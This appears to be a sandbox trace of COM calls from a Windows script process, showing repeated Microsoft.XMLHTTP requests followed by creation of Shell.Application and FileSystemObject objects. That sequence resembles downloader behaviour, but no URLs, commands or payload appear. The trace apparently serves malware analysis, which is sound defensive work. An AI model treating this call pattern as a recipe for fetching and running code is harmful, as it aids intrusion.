	[0818.877] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0818.877] SysStringLen (param_1=0x0) returned 0x0
	[0818.877] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0818.877] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0818.877] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0818.877] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0818.878] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0818.878] ??2@YAPEAX_K@Z () returned 0x62f330
	[0818.878] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0818.878] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0818.878] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0818.878] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0818.878] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0818.878] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0818.878] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0818.879] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0818.879] longjmp () 
	[0818.880] longjmp () 
	[0818.880] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0818.880] SysStringLen (param_1=0x0) returned 0x0
	[0818.880] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0818.881] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0818.881] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0818.881] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0818.881] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0818.881] ??2@YAPEAX_K@Z () returned 0x62f310
	[0818.881] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0818.881] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0818.881] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0818.881] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0818.881] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0818.881] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0818.881] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0818.881] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0818.881] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0818.882] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0818.882] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0820.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0820.186] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0820.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0820.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0820.186] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0820.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0820.187] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0820.187] SysStringLen (param_1=0x0) returned 0x0
	[0820.187] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0820.187] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0820.187] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0820.187] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0820.187] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0820.187] ??2@YAPEAX_K@Z () returned 0x62f350
	[0820.187] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0820.187] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0820.187] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0820.187] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0820.187] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0820.188] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0820.188] SysStringLen (param_1=0x0) returned 0x0
	[0820.188] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0820.191] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0820.191] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0820.191] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0820.191] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0820.191] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0820.191] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0824.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0824.239] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0824.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0824.241] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0824.241] SysStringLen (param_1=0x0) returned 0x0
	[0824.241] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0824.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0824.241] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0824.241] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0824.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0824.241] ??2@YAPEAX_K@Z () returned 0x62f310
	[0824.241] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f310) 
	[0824.241] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0824.242] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0824.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0824.242] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0824.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0824.242] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0824.245] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0824.245] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0824.245] SysStringLen (param_1=0x0) returned 0x0
	[0824.245] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0824.246] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0824.246] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0824.246] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0824.246] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0824.246] ??2@YAPEAX_K@Z () returned 0x62f330
	[0824.246] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0824.246] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0824.246] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0824.246] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0824.246] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0824.246] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0824.247] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0824.247] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
